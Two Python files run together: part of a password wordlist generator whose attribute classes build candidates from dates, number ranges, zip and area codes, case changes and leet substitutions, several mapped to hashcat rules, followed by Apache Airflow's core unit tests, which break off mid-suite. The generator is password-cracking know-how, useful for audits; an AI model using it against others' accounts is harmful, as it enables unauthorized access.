def count_words(self, prev_word_count):
return prev_word_count + self.word_count
def count_bytes(self, prev_byte_count, prev_word_count):
return prev_byte_count + self.byte_count
class RangeAttr(BaseAttr):
'''Generates each number in an integer range
'''
def __init__(self, start, end, zfill=0, label=""):
'''
start, end: integers as in Python's range()
zfill: pad with leading zeros to this length
'''
BaseAttr.__init__(self, label)
self.start = start
self.end = end
self.zfill = zfill
self.byte_count = 0
for i in range(self.start, self.end):
self.byte_count += len(str(i).zfill(zfill))
def get_words(self, prev_words):
for word in prev_words:
yield word
for i in range(self.start, self.end):
yield str(i).zfill(self.zfill)
def count_words(self, prev_word_count):
return prev_word_count + (self.end - self.start)
def count_bytes(self, prev_byte_count, prev_word_count):
return self.byte_count
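# e.g. RangeAttr(0, 100, zfill=2) yields '00' through '99': 100 words,
# 200 bytes.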
class DateRangeAttr(ThreadingAttr):
'''Generates numerical date strings for a range of dates with the given format
'''
def __init__(self, start_year, end_year, format, zero_padding, controller=None, label=""):
'''
controller: used to communicate about word counting
start_year, end_year: integers as in Python's range()
format: a string indicating the date format, for example mmddyyyy
zero_padding: a boolean indicating whether single-digit months and days
should have leading zeros
'''
BaseAttr.__init__(self, label)
self.start_year = start_year
self.end_year = end_year
self.format = format
self.zero_padding = zero_padding
self.controller = controller
self.calculating = True
if self.controller is not None:
self.controller.word_calculator_count += 1
self.controller.update_counts() # update word counts to 'Calculating...'
self.worker_thread = threading.Thread(target=self.threaded_word_counter)
self.kill_flag = False
else:
# When there is no controller (in model tests), run the word counter
# in the main thread
self.kill_flag = False
self.threaded_word_counter()
if self.controller is not None:
self.worker_thread.start()
def threaded_word_counter(self):
'''The date strings are pre-computed, but take a few seconds to compute,
so do it in a background thread
'''
# convert the format to a Python format string
four_digit_year = 'yyyy' in self.format
has_year = 'y' in self.format
has_day = 'd' in self.format
type_list = [self.format[0]]
if has_year and has_day:
type_list.append([f for f in ['m', 'd', 'y'] \
if f not in [self.format[0], self.format[-1]]][0])
type_list.append(self.format[-1])
format_items = []
for t in type_list:
format_items.extend(['{', t])
if (t in ['m', 'd'] and self.zero_padding) or (t == 'y'):
format_items.append(':02')
format_items.append('}')
format_string = ''.join(format_items)
self.dates = []
self.byte_count = 0
for year in range(self.start_year, self.end_year):
if self.kill_flag:
break
if four_digit_year:
display_year = year
else:
display_year = year - (year // 100) * 100
for month in range(1, 13):
if has_day:
weekdays, days = calendar.monthrange(year, month)
for day in range(1, days+1):
if self.kill_flag:
break
if has_year:
date = format_string.format(y=display_year, m=month, d=day)
else:
date = format_string.format(m=month, d=day)
if date not in self.dates:
self.dates.append(date)
self.byte_count += len(date)
else:
date = format_string.format(y=display_year, m=month)
self.dates.append(date)
self.byte_count += len(date)
self.calculating = False
if self.controller is not None:
self.controller.word_calculator_count -= 1
if not self.kill_flag:
self.controller.update_counts()
def get_words(self, prev_words):
for word in prev_words:
yield word
for date in self.dates:
yield date
def count_words(self, prev_word_count):
return prev_word_count + len(self.dates)
def count_bytes(self, prev_byte_count, prev_word_count):
return self.byte_count
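# e.g. DateRangeAttr(1990, 1992, 'mmddyyyy', True) yields '01011990' through
# '12311991', one word per calendar day in 1990-1991.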
def load_codes(location_type, code_type):
'''Load zip codes and area codes
'''
path = os.path.join(data_dir, '-'.join([location_type, code_type])+'.psv')
code_dict = {}
i = 0
for line in open(path).read().split('\n'):
if line == '': continue # allow final newline
location, codes = line.split('|')
i += 1
codes = codes.split(',')
if location in code_dict:
code_dict[location].extend(codes)
else:
code_dict[location] = codes
return code_dict
location_codes = {}
for location_type in ['City', 'State']:
location_codes[location_type] = {}
for code_type in ['Area', 'Zip']:
location_codes[location_type][code_type] = load_codes(location_type, code_type)
def clean_code_file(location_type, code_type):
'''Utility for outputting sorted version of code file with no duplicates
'''
path = os.path.join(data_dir, '-'.join([location_type, code_type])+'.psv')
with open(path, 'w') as f:
for state, codes in sorted(location_codes[location_type][code_type].items()):
f.write('|'.join([state, ','.join(sorted(set(codes)))])+'\n')
class LocationCodeAttr(BaseAttr):
'''Generates zip codes and area codes
'''
def __init__(self, code_type, location, location_type, label=""):
'''
code_type: 'Area' or 'Zip'
location_type: 'City' or 'State'
location: string, like 'Boston, MA' or 'CA'
'''
BaseAttr.__init__(self, label)
self.code_type = code_type
self.location = location
self.location_type = location_type
codes_dict = location_codes[location_type][code_type]
self.codes = codes_dict[self.location]
self.byte_count = sum(map(len, self.codes))
def get_words(self, prev_words):
for word in prev_words:
yield word
for code in self.codes:
yield code
def count_words(self, prev_word_count):
return prev_word_count + len(self.codes)
def count_bytes(self, prev_byte_count, prev_word_count):
return self.byte_count
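# e.g. LocationCodeAttr('Zip', 'CA', 'State') yields every zip code listed
# for California in data/State-Zip.psv.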
class NothingMutatorAttr(BaseAttr):
'''Generates just the unmodified input words, with no mutation
'''
def get_words(self, prev_words):
return prev_words
def count_words(self, prev_word_count):
return prev_word_count
def count_bytes(self, prev_byte_count, prev_word_count):
return prev_byte_count
def get_rules(self):
return [':']
class NothingAdderAttr(BaseAttr):
'''Generates just the unmodified input words, with nothing appended
'''
def get_words(self, prev_words):
return [""]
def count_words(self, prev_word_count):
return prev_word_count + 1
def count_bytes(self, prev_byte_count, prev_word_count):
return prev_byte_count
class CaseAttr(BaseAttr):
'''Modifies the case of letters in the word
'''
def __init__(self, type_, case=None, idx=None, label=""):
'''
type_: 'First' (just the first letter), 'All' (all letters), or 'Toggle'
(switch upper case to lower case, and vice versa)
case: 'Uppercase', 'Lowercase' (change letters to this case), or None
(for Toggle)
idx: Modify the character at this index
'''
BaseAttr.__init__(self, label=label)
self.type_ = type_
self.case = case
self.idx = idx
def get_words(self, prev_words):
for word in prev_words:
if word == "":
yield word
continue
if self.type_ == 'First':
string_list = list(word)
if self.case == 'Lowercase':
string_list[0] = string_list[0].lower()
for i in range(1, len(string_list)):
string_list[i] = string_list[i].upper()
else:
string_list[0] = string_list[0].upper()
for i in range(1, len(string_list)):
string_list[i] = string_list[i].lower()
yield ''.join(string_list)
elif self.type_ == 'All':
if self.case == 'Lowercase':
yield word.lower()
else:
yield word.upper()
elif self.type_ == 'Toggle':
if len(word) > self.idx:
string_list = list(word)
if string_list[self.idx].isupper():
string_list[self.idx] = string_list[self.idx].lower()
else:
string_list[self.idx] = string_list[self.idx].upper()
yield ''.join(string_list)
else:
yield word
def count_words(self, prev_word_count):
return prev_word_count
def count_bytes(self, prev_byte_count, prev_word_count):
return prev_byte_count
def get_rules(self):
if self.type_ in ['First', 'All']:
rule = {'First': {'Uppercase': 'c',
'Lowercase': 'C'},
'All': {'Uppercase': 'u',
'Lowercase': 'l'},
}[self.type_][self.case]
elif self.type_ == 'Toggle':
rule = 'T{}'.format(self.idx)
return [rule]
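# e.g. CaseAttr('All', 'Uppercase') maps to hashcat rule 'u', and
# CaseAttr('Toggle', idx=0) maps to 'T0'.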
# This file contains the percent of English dictionary words containing at least
# one instance of each letter.
character_freq = {}
for line in open(os.path.join(data_dir, 'Letter_Stats.txt')).read().split('\n'):
if line == '': continue # allow final newline
letter, percent = line.split(',')
character_freq[letter] = float(percent[:-1]) / 100.
class SubstitutionAttr(BaseAttr):
'''Substitutes one character for another
'''
def __init__(self, type_, checked_vals, all_together, label=""):
'''
type_: 'First' (substitute the first instance), 'Last' (substitute
the last instance), or 'All' (substitute all instances)
checked_vals: a list of substitution strings of the form 'old -> new'
all_together: If False, the substitutions in checked_vals will generate
one output word for each substitution matching the
input word, with the substitutions applied one at a time.
If True, just one output word will be generated for each
input word, with all substitutions applied together.
'''
BaseAttr.__init__(self, label=label)
self.type_ = type_
self.checked_vals = checked_vals
self.all_together = all_together
self.replacements = []
for check in checked_vals:
self.replacements.append(check.split(' -> '))
if self.all_together:
self.character_freqs = [0.]
else:
self.character_freqs = []
for original, _ in self.replacements:
freq = character_freq.get(original, 0.)
if all_together:
self.character_freqs[0] += (1. - self.character_freqs[0]) * freq
else:
self.character_freqs.append(freq)
def get_words(self, prev_words):
for word in prev_words:
if word == "":
yield word
continue
string_list = list(word)
if self.type_ in ["First", "All", "Nth"]:
idx_range = range(len(string_list))
else:
idx_range = range(len(string_list) - 1, -1, -1)
found_replacement_word = False
for original, replacement in self.replacements:
found_replacement_sub = False
for i in idx_range:
if string_list[i].lower() == original:
string_list[i] = replacement
found_replacement_word = True
found_replacement_sub = True
if self.type_ in ['First', 'Last']:
if not self.all_together:
yield ''.join(string_list)
string_list = list(word)
break
if self.type_ == 'All' and found_replacement_sub and not self.all_together:
yield ''.join(string_list)
string_list = list(word)
if self.all_together:
yield ''.join(string_list)
elif not found_replacement_word:
yield word
def check_hashcat_compatible(self):
if self.type_ in ['First', 'Last']:
return False
else:
return True
def get_rules(self):
rules = []
for original, replacement in self.replacements:
if len(original) > 1 or len(replacement) > 1:
print('Warning: excluding multi-character substitution, not supported in hashcat rules:', original, replacement)
else:
rules.append('s' + original + replacement)
if self.all_together:
return [''.join(rules)]
else:
return rules
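# e.g. replacements a->@ and s->$ produce the rules ['sa@', 'ss$'], or the
# single combined rule ['sa@ss$'] when all_together is True.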
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import io
import json
import multiprocessing
import os
import pickle # type: ignore
import re
import signal
import subprocess
import tempfile
import unittest
import warnings
from datetime import timedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from tempfile import NamedTemporaryFile
from time import sleep
from typing import Optional
from unittest import mock
import sqlalchemy
from dateutil.relativedelta import relativedelta
from numpy.testing import assert_array_almost_equal
from pendulum import utcnow
from airflow import DAG, configuration, exceptions, jobs, models, settings, utils
from airflow.bin import cli
from airflow.configuration import AirflowConfigException, conf, run_command
from airflow.exceptions import AirflowException
from airflow.executors import SequentialExecutor
from airflow.hooks import hdfs_hook
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.models import (
BaseOperator, Connection, DagBag, DagModel, DagRun, Pool, TaskFail, TaskInstance, Variable,
)
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.dates import days_ago, infer_time_unit, round_time, scale_time_units
from airflow.utils.state import State
from airflow.utils.timezone import datetime
from tests.test_utils.config import conf_vars
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
EXAMPLE_DAG_DEFAULT_DATE = days_ago(2)
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super().__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(self, context):
pass
class TestCore(unittest.TestCase):
TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_no_previous_runs'
TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID = \
TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous'
TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID = \
TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only'
TEST_SCHEDULE_ONCE_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_once'
TEST_SCHEDULE_RELATIVEDELTA_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_relativedelta'
TEST_SCHEDULE_START_END_DATES_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_start_end_dates'
default_scheduler_args = {"num_runs": 1}
def setUp(self):
self.dagbag = DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def tearDown(self):
if os.environ.get('KUBERNETES_VERSION') is not None:
return
dag_ids_to_clean = [
TEST_DAG_ID,
self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID,
self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
self.TEST_SCHEDULE_ONCE_DAG_ID,
self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
]
session = Session()
session.query(DagRun).filter(
DagRun.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.query(TaskInstance).filter(
TaskInstance.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.query(TaskFail).filter(
TaskFail.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.commit()
session.close()
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_relativedelta(self):
"""
Tests scheduling a dag with a relativedelta schedule_interval
"""
delta = relativedelta(hours=+1)
dag = DAG(self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
schedule_interval=delta)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run2)
self.assertEqual(dag.dag_id, dag_run2.dag_id)
self.assertIsNotNone(dag_run2.run_id)
self.assertNotEqual('', dag_run2.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0) + delta,
dag_run2.execution_date,
msg='dag_run2.execution_date did not match expectation: {0}'
.format(dag_run2.execution_date)
)
self.assertEqual(State.RUNNING, dag_run2.state)
self.assertFalse(dag_run2.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(self.TEST_SCHEDULE_ONCE_DAG_ID)
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for _ in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
now = utcnow()
start_date = now.subtract(weeks=1)
runs = (now - start_date).days
dag = DAG(self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
start_date=start_date,
schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for _ in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
('Invalid arguments were passed to BashOperator '
'(task_id: test_illegal_args).'),
w[0].message.args[0])
def test_illegal_args_forbidden(self):
"""
Tests that operators raise exceptions on illegal arguments when
illegal arguments are not allowed.
"""
with conf_vars({('operators', 'allow_illegal_arguments'): 'False'}):
with self.assertRaises(AirflowException) as ctx:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertIn(
('Invalid arguments were passed to BashOperator '
'(task_id: test_illegal_args).'),
str(ctx.exception))
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command="echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_on_failure_callback(self):
# Annoying workaround for nonlocal not existing in python 2
data = {'called': False}
def check_failure(context, test_case=self):
data['called'] = True
error = context.get('exception')
test_case.assertIsInstance(error, AirflowException)
t = BashOperator(
task_id='check_on_failure_callback',
bash_command="exit 1",
dag=self.dag,
on_failure_callback=check_failure)
self.assertRaises(
exceptions.AirflowException,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(data['called'])
def test_trigger_dagrun(self):
def trigga(_, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
'{\n "foo": "bar"\n}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject:
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_task_get_template(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT DATE is 2015-01-01
self.assertEqual(context['ds'], '2015-01-01')
self.assertEqual(context['ds_nodash'], '20150101')
# next_ds is 2015-01-02 as the dag interval is daily
self.assertEqual(context['next_ds'], '2015-01-02')
self.assertEqual(context['next_ds_nodash'], '20150102')
# prev_ds is 2014-12-31 as the dag interval is daily
self.assertEqual(context['prev_ds'], '2014-12-31')
self.assertEqual(context['prev_ds_nodash'], '20141231')
self.assertEqual(context['ts'], '2015-01-01T00:00:00+00:00')
self.assertEqual(context['ts_nodash'], '20150101T000000')
self.assertEqual(context['ts_nodash_with_tz'], '20150101T000000+0000')
self.assertEqual(context['yesterday_ds'], '2014-12-31')
self.assertEqual(context['yesterday_ds_nodash'], '20141231')
self.assertEqual(context['tomorrow_ds'], '2015-01-02')
self.assertEqual(context['tomorrow_ds_nodash'], '20150102')
def test_local_task_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
